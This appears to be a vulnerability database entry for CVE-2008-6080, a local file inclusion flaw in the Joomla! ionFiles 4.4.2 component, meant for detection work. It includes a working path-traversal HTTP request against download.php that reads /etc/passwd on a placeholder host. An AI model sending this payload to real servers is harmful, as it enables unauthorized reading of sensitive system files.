🔙 목록으로 돌아가기

CVE-2008-6080: Joomla! ionFiles 4.4.2 - Local File Inclusion

TitleJoomla! ionFiles 4.4.2 - Local File Inclusion
Authordaffainfo
SeverityMedium
ImpactSuccessful exploitation of this vulnerability can lead to unauthorized access to sensitive files and potential remote code execution.
RemediationUpdate Joomla! ionFiles to the latest version or apply the provided patch to mitigate the vulnerability.
CVSS Score5
EPSS Score0.06734
CVE IDCVE-2008-6080
CWE IDCWE-22
Tags cve cve2008 edb joomla lfi codecall vuln

🔍 Vulnerability Description

Joomla! ionFiles 4.4.2 is susceptible to local file inclusion in download.php in the ionFiles (com_ionfiles) that allows remote attackers to read arbitrary files via a .. (dot dot) in the file parameter.

🌐 HTTP Request

GET /components/com_ionfiles/download.php?file=../../../../../../../../etc/passwd&download=1 HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Windows NT 10.0: Win64: x64: rv:140.0) Gecko/20100101 Firefox/140.0
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

📚 References


🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2008/CVE-2008-6080.yaml

🦈 Packet Capture: ⬇️ Download cve-2008-6080.pcap

⚠️ Notice: These rules are for detection purposes. Please tune them before applying to a production environment.
Snort 2 Rule
N/A
Snort 3 Rule
N/A